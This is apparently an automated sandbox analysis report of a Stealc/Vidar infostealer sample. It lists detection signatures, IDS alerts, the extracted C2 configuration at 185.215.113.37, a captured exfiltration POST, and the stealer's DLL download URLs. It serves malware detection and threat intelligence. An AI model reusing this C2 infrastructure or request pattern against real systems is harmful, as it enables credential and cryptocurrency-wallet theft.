Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1523568
MD5:	dcd1d03f386dab945a8b534dac3d7622
SHA1:	181b3898125e89809f0a8a113ba76cca0eafe634
SHA256:	91d20ed7e7cb5e93f1a7c51ae70ff4f45bd444b9547f0dfad6dcccec6e7aa8b8
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5424 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DCD1D03F386DAB945A8B534DAC3D7622)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2038617483.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5424	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5424	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 5424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5424	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.40000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:03.445610+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:03.439267+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:03.673425+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:04.801827+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:03.680581+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:03.216928+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T19:32:05.019278+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:11.361477+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:12.596569+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:13.263028+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:13.798159+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:15.777504+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:16.275187+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 30 39 44 38 45 35 41 42 38 36 33 35 37 36 38 35 30 37 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 2d 2d 0d 0a Data Ascii: ------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="hwid"3009D8E5AB863576850798------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="build"doma------CFIJEBFCGDAAKFHIDBFI--

Source: file.exe, 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/)I
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll4Z
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll&Z
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll:Z
Source: file.exe, 00000000.00000002.2266789162.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2266789162.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll8n
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllPZ
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllPX
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllrX
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(Q
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLQ
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpPQ
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpQ
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpare
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdllz
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdowsApps
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpge
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpinomi
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37S
Source: file.exe, 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287566272.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: IDBFHJDA.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: IDBFHJDA.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IDBFHJDA.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IDBFHJDA.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://support.mozilla.org
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: IDBFHJDA.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/80x1024
Source: file.exe, 00000000.00000003.2199371080.000000002F52C000.00000004.00000020.00020000.00000000.sdmp, HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2199371080.000000002F52C000.00000004.00000020.00020000.00000000.sdmp, HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2199371080.000000002F52C000.00000004.00000020.00020000.00000000.sdmp, HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
